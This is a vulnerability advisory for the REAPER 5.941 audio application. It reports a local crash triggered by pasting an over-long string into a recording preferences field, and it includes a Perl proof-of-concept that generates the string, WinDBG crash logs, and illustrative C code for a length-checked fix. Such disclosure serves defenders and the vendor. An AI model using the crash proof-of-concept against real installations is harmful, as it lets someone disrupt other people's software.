Document Title:
===============
Reaper 5.941 - Pointer Vulnerability
Product & Service Introduction:
===============================
REAPER is a complete digital audio production application for computers, offering a full multitrack audio
and MIDI recording, editing, processing, mixing and mastering toolset.
(Copy of the Vendor Homepage: https://www.reaper.fm/)
Exploitation Technique:
=======================
Local
Platform Tested:
===============
Windows 7
Technical Details & Description:
================================
A pointer vulnerability was detected in Reaper v5.941. A local attacker can crash the running software (reaper.exe) through an invalid read pointer.
The vulnerability allows a local attacker to crash the software process by supplying an over-long value to an input field of a primary module and then triggering its processing.
Vulnerable Modules:
===================
[+] Options -> Preference > Recording > Input Name : `Filename format for recorded files`
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers. For demonstration or to reproduce the issue, follow the steps below.
1. Launch Reaper.exe
2. Click Options -> Preference > Recording
3. Copy the AAAA...+ string from test.txt.txt to the clipboard
4. Paste the AAAA....+ string into the input `Filename format for recorded files`, then click Wildcards and $track
5. Reaper will crash.
-- PoC Exploit --
#!/usr/bin/perl
use strict;
use warnings;
# Build a 1,218,000-byte string of 'A' characters for the PoC input
my $Buff = "A" x 1218000;
# Append the buffer to test.txt in the current directory
open(my $fh, '>>', 'test.txt') or die "Cannot open test.txt: $!";
print $fh $Buff;
close($fh);
print "POC Created by ZwX\n";
--- Debug Session Logs [WinDBG] ---
PROBLEM_CLASSES:
ID: [0n309]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0xe2c]
Frame: [0] : unknown!unknown
ID: [0n281]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0xe2c]
Frame: [0] : unknown!unknown
ID: [0n292]
Type: [BAD_INSTRUCTION_PTR]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [0x1208]
TID: [0xe2c]
Frame: [0] : unknown!unknown
BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
STACK_TEXT:
0012df24 008303dd reaper+0x4303dd
0012dfac 009aaec9 reaper+0x5aaec9
0012dff4 004ac104 reaper+0xac104
0012e018 009b404f reaper+0x5b404f
0012e034 009b3f09 reaper+0x5b3f09
0012e0ed 03000000 unknown!unknown+0x0
MODULE_NAME: reaper
IMAGE_NAME: reaper.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5b65abe3
STACK_COMMAND: .cxr 12dc40 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ** Pseudo Context ** Pseudo ** Value: 5a228e0 ** ; kb
FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_c0000005_reaper.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_BAD_IP_reaper+4303dd
0:000> lmvm reaper
start end module name
00400000 00dd7000 reaper C (no symbols)
Loaded symbol image file: C:\Program Files\REAPER\reaper.exe
Image path: C:\Program Files\REAPER\reaper.exe
Image name: reaper.exe
Timestamp: Sat Aug 4 06:36:35 2018 (5B65ABE3)
CheckSum: 00000000
ImageSize: 009D7000
File version: 5.9.4.0
Product version: 5.9.4.0
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
Information from resource tables:
CompanyName: Cockos Incorporated
ProductName: REAPER
InternalName: REAPER
OriginalFilename: reaper.exe
ProductVersion: 5.941
FileVersion: 5.941
PrivateBuild: 5.941
SpecialBuild: 5.941
FileDescription: REAPER
LegalCopyright: Copyright © 2005-2018
LegalTrademarks: REAPER is a registered trademark of Cockos Incorporated
Comments: REAPER is a registered trademark of Cockos Incorporated
Solution - Fix & Patch:
=======================
Restrict the number of characters accepted by the `Filename format for recorded files` entry, and reject over-long values before wildcard expansion, to prevent the software from crashing.
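The following is an added example of the fix direction described above, written for this page and not taken from REAPER's source. It implements a bounded expander for a filename format template: the template length is checked against a cap before any processing (the advisory's suggested restriction), and the `$track` wildcard is substituted into a fixed-capacity output buffer with an explicit space check. The two limits, the function names and the track name are assumptions chosen for the illustration; the 1218000-byte input in the demo mirrors the PoC on this page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed limits for the illustration (not values from the product). */
#define FORMAT_MAX_LEN   256   /* longest template the UI field should accept */
#define FILENAME_MAX_LEN 260   /* capacity of the expanded filename buffer */

/* Returns 1 if s is NUL-terminated within max_len bytes, else 0.
 * Never reads more than max_len + 1 bytes, so an enormous pasted string
 * is rejected without being scanned to its end. */
static int fits_within(const char *s, size_t max_len)
{
    return memchr(s, '\0', max_len + 1) != NULL;
}

/* Expand every "$track" in fmt into out (capacity out_cap).
 * Return codes:  0 success
 *               -1 template rejected (NULL, or longer than FORMAT_MAX_LEN)
 *               -2 expanded result would not fit in out */
int expand_filename_format(const char *fmt, const char *track_name,
                           char *out, size_t out_cap)
{
    const char *wild = "$track";
    size_t wild_len = strlen(wild);
    size_t track_len, pos = 0;

    if (fmt == NULL || track_name == NULL || out == NULL || out_cap == 0)
        return -1;
    /* Length restriction applied up front, before any wildcard handling. */
    if (!fits_within(fmt, FORMAT_MAX_LEN))
        return -1;

    track_len = strlen(track_name);
    while (*fmt != '\0') {
        if (strncmp(fmt, wild, wild_len) == 0) {
            /* Substitute the wildcard; keep one byte for the terminator. */
            if (pos + track_len >= out_cap)
                return -2;
            memcpy(out + pos, track_name, track_len);
            pos += track_len;
            fmt += wild_len;
        } else {
            if (pos + 1 >= out_cap)
                return -2;
            out[pos++] = *fmt++;
        }
    }
    out[pos] = '\0';
    return 0;
}

/* Demo: feed a constructed template of 1218000 'A' bytes (the size used by
 * the PoC script on this page) and report the expander's verdict. */
int demo_reject_long_template(void)
{
    char out[FILENAME_MAX_LEN];
    size_t n = 1218000;
    char *big = malloc(n + 1);
    int rc;

    if (big == NULL)
        return -99;
    memset(big, 'A', n);
    big[n] = '\0';
    rc = expand_filename_format(big, "Vocals", out, sizeof out);
    free(big);
    return rc;   /* -1: rejected before expansion */
}

int main(void)
{
    char out[FILENAME_MAX_LEN];
    int rc = expand_filename_format("rec-$track-take1", "Vocals", out, sizeof out);
    printf("normal template: rc=%d out=\"%s\"\n", rc, out);
    printf("1218000-byte template: rc=%d\n", demo_reject_long_template());
    return 0;
}
```

The first check is what the advisory's fix amounts to: an over-long value never reaches the wildcard code. The second check (`-2`) covers the other failure mode a practitioner would want handled, a short template whose expansion still outgrows the destination buffer.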
Credits & Authors:
==================
Social: twitter.com/@ZwX2a
Programs: vulnerability-lab.com/show.php?user=ZwX - hackerone.com/zwx - www.openbugbounty.org/researchers/ZxX/
Contact : msk4@live.fr